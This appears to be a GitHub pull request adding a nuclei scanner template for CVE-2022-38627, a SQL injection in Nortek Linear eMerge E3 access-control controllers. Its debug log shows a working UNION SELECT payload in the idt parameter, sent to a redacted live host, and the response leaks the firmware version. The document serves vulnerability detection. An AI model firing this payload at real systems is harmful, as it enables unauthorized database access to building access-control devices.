Add CVE-2022-38627 (vKEV)

[daffainfo]

Template / PR Information

Nortek Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e were discovered to contain a SQL injection vulnerability via the idt parameter.

Template Validation

I've validated this template locally?

• YES
• NO

Debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2022-38627] Dumped HTTP request for http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version

GET /badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-38627] Dumped HTTP response http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version

HTTP/1.1 200 OK
Connection: close
Content-Length: 1359
Content-Type: text/html; charset=UTF-8
Date: Tue, 23 Sep 2025 07:38:08 GMT
Server: lighttpd/1.4.22
X-Powered-By: PHP/7.3.8


<head>
<script type="text/javascript" src="/js/jquery-1.8.3.min.js"></script>
    <script type="text/javascript">
         $("#btnPrint").live("click", function () {
             var divContents = $("#preview").html();
             var printWindow = window.open('', '', 'height=204px,width=324px');
             // printWindow.document.write('<html><head><title>DIV Contents</title>');
             // printWindow.document.write('</head><body >');
             printWindow.document.write(divContents);
             //printWindow.document.write('</body></html>');
             printWindow.document.close();
             printWindow.print();
         });
    </script>

    <link rel="shortcut icon" href="../img/emerge.ico">
</head>    
<div id='preview' style='width:324px; height:204px; border:2px black solid'><span style='position:absolute; margin-top:0px; margin-left:0px;'><img src='bg/' width=324px height=204px/></span><span id='logo' style='position:absolute; margin-top:px; margin-left:px; '><img width=0px height=0px src='logo/' id='logopict'/></span><span id='pict' style='position:absolute; margin-top:px; margin-left:px; '><img src=../user_img/ SWVersion:0.32-09c width='110px' height='130px'/></span></div><div><input type='button' value='Print Badge' id='btnPrint' style='width:120; height:30; background-color:#2E2E2E; color:#D8D8D8' ></div>
[CVE-2022-38627:word-1] [http] [critical] http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version
[CVE-2022-38627:word-2] [http] [critical] http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version
[CVE-2022-38627:status-3] [http] [critical] http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version
[INF] Scan completed in 579.67375ms. 3 matches found.

[princechaddha]

@daffainfo I have updated the POC because the matcher was only looking for a string in the GET parameters instead of the extracted version value, which could match patched versions or produce false positives. I have updated the payload and matcher to make sure the SQLi is happening.

[algora-pbc]

🎉🎈 @daffainfo has been awarded $200 by ProjectDiscovery! 🎈🎊